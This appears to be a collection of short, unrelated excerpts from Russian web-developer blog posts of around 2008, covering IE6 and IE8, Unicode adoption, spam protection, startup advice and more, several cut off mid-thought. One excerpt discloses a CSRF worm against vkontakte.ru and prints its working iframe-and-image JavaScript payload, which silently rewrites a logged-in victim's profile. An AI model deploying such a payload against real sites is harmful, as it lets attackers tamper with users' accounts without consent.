Поучительный рассказ для веб-дизайнеров, программистов, аниматоров, иллюстраторов других разработчиков



Я хочу вам рассказать о том, как меня штрафанули на 15 000 рублей за то, что я числился в штате, спустя пол года после неформального увольнения.

Без предистории никак

Бывает, сделаем сайт или дизайн, или ТЗ напишем…

… а сдать в срок не получается.

Лидеры отговорок:

Как он его называет «аи восемь»
Однажды мы с shergin поехали на РИТ2008, где очень мило поболтали с Алексом Могилевским.



Обрывки этой болтовни захотелось опубликовать.
Близко по смыслу, но не дословно.
Никто из участников интервью не несёт ответственности за достоверность предоставленной информации ;)

Согласно статистике от Google, Unicode опередил ASCII и теперь стал самой популярной системой кодирования символов в интернете. Как видно на графике, за последние два года число сайтов на UTF-8 резко выросло, так что в течение всего десяти дней в декабре Unicode опередил сразу двух прежних лидеров: ASCII и западноевропейскую кодировку 8859-1/1252 (это та же ASCII с добавлением нескольких символов).

Специалисты Google отмечают, что это вполне закономерный процесс, хотя, по их словам, вызывает удивление та ошеломляющая скорость, с которой произошла «революция кодировок» в интернете.

После появившейся на общеизвестном сервисе новой функции «Папки друзей» мне в голову пришла идея возможности тегировать друзей, вместо раскладывания их по папкам.
Судя по тегам, можно сразу определить, что с Василием Вас связывает работа, он должен 20 у.е. и всегда готов устроить небольшую попойку. Дмитрий также благосклонно относится к совместному распитию спиртного, служил вместе с Вами в армии и он тоже знаком с некоей Лилией, которая каким-то образом связана с пианино.

Как вам, хабрачеловеки?

Объясняя однажды преимущества таких браузеров, как firefox и opera перед всеми любимым IE, я осознал насколько не очевидны их преимущества при рассказе о них.

• Табы большинство пользователей воспринимают как нечто заумное — они привыкли переключаться между окнами, ища нужное внизу на панельке. У многих она для этого специально делается двойной а то и тройной ширины.
  
• Обработка полупрозрачных PNG для нормальных людей звучит вообще как страшное шаманское заклинание. И конечным потребителям, в итоге, глубоко плевать, насколько на сайте сделана честная полупрозрачность и на скольких костылях она держится. Это целиком проблемы вебмастеров. Юзерам о них можно даже не упоминать.
  
• CSS 3 уровня непонятен пользователям точно так-же как и полупрозрачность в картинках — они с этим не сталкиваются и им все равно.
  
• Проверка орфографии понятна уже многим. Несмотря на то, что обычно в качестве аргумента приводят проверку орфографии в ворде, расстановку им заглавных букв и прочие мелочи, простые пользователи даже сами замечают различия между IE и другими браузерами — у меня было несколько вопросов, мол почему дома и на-работе ВКонтакт выглядит по-разному.
  
• Быстродействие особенно актуально для пользователей рискнувших перейти на IE7 — разница в скорости ощущается невооруженным взглядом. Обычно такие пользователи быстро откатываются на IE6, но достаточно серьезным аргументов для них будет упоминание о дате выпуска IE6 — многих это подталкивает к переходу на более новые браузеры.
  

Во всем этом списке нет ни одного железного аргумента для простого пользователя, чтобы уйти с IE6. Для разработчиков, стремящихся использовать новые возможности браузеров, это большая проблема. Но кого она волнует кроме них? Поэтому проводятся всевозможные акции из серии «Заблокируй для IE доступ на свой сайт», которые приносят какой-то эффект, но этого явно недостаточно. Я хочу предложить еще один способ для ослабления позиций «самого любимого» браузера, который кардинально отличается от подобных акций.

Microsoft в рамках акции «10 000 доменов в подарок» начала регистрировать домены в зоне .ru любым желающим! Вы можете зарегистрировать один домен на себя. В процессе регистрации указываете свои паспортные данные, регистрируетесь в неком «Персонал-Н» и вуаля. Инструкция к действиям:

1. Заходим на platforma2008.ru/Materials.aspx?…
2. Регаемся
3. Заходим в личные данные.

1. Не стоит планировать все с самого начала и до мелочей.
(Если ты не проектируешь баллистическую ракету, конечно). В процессе реализации тебе будут приходить новые интересные идеи и лучшее понимание некоторых вещей. Возможно, что часть функций которые ты так тщательно проектировал вообще не будут востребованы.

Сделал часть фич — залей на сайт, пусть друзья (первые пользователи) потестирует, посмотри что они скажут.

Первые релизы будут пробой пера, ты будешь искать что работает, а что нет, что хорошо, а что не очень. Поэтому уделяй меньше времени красоте кода и стройности базы данных и больше новым фичам, новым возможностям.

Часто пользователи удивляются, откуда спаммеры узнают их e-mail адреса и выливают на них тонны спама. Оставляя за рамками этой статьи такие способы пополнения спаммерских базы, как вирусы, «слив» адресов владельцами почтового сервера или прослушивание HTTP и ICQ траффика, рассмотрим самый распространенный случай.
Одним из основных источников новых e-mail адресов являются собственно веб-страницы, на которых беспечные пользователи (а порой и владельцы сайта) открыто публикуют свой e-mail, откуда спамботы (сборщики e-mail) без проблем его извлекают и используют в своих нехороших целях.

Далее будут рассмотрены основные приемы шифрования e-mail адресов от спамботов, а также приведены результаты замера эффективности каждого из приемов, путем практического использования каждого способа для свежезарегистрированных e-mail адресов и оценки количества спама.

Очень практично оформлять кликабельные картинки, к примеру при наведении на картинку появится изображения говорящее о том что эта картинка кликабельна — как на картинке выше.

Ответ как же все таки появился веб 2.0

Если так показывать процесс работы заказчику, то вопросов «почему так дорого» у него не встанет. )

Приготовтесь, сейчас вы увидите предтечу всех священных войн на ресурсах, где зависают веб-разработчики. Перл Харбор по сравнению с этим покажется тем случаем на семейном чаепитии у бабушки, когда ваша сводная сестра в гневе выбежала из комнаты и поцеловала Мустангом дерево во дворе.

Предстоящая битва будет проходить под председательством Дена Хашамовича, ветерана Майкрософт, который сейчас возглавляет команду, готовящую вам Интернет Эксплорер 8.0. Команда IE8 сейчас в процессе принятия решения, которое лежит идеально точно и ровнехонько на той самой линии, что разделяет два разных пути видения мира.

Это граница между «консерваторами» и «либералами». Это граница между «идеалистами» и «реалистами».

Суть проблемы

Возможность пользователя ввести оооочень длинное слово без пробелов, и тем самым «взорвать» layout — это старая проблема. Вот так она решается на Хабре.

Эта небольшая статья поможет новичкам (и не только) оценить удобство собственного сайта и укажет основные недочёты, присущие многим сайтам. Ваши пользователи скажут вам спасибо =)

Хочу поделиться базой стран, регионов и городов на русском языке. Возможно, кому-то пригодиться в своих проектах. В базе 106 стран, 922 региона и 10969 городов!

Если кто не понял о чем речь, то вспомните, например, как на ВКонтакте указывается город: выбирается страна -> подгружается список регионов -> выбирается регион -> подгружается список городов

Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
  var html;
  html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле «Веб-сайт» станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе… И т д.

Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.

Отписал в тех-поддержку, где столкнулся с «Это не баг!», «Не кликайте по подозрительным ссылкам!» и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом «вирусе», который живет целиком в соц-сети =)

Вот в процессе серфинга попалась замечательная и удобная штука. В схематичном виде представляет

CSS 2.1, улучшенная поддержка стандартов, ускоренный рендеринг JavaScript и другое можно будет попробовать уже в течение часа.
На MIX'08 представляют IE8.
Итак, в течение часа IE8b1 будет доступен тут.

UPD: Уже качаем тут)

О главном: Acid 3 — 17/100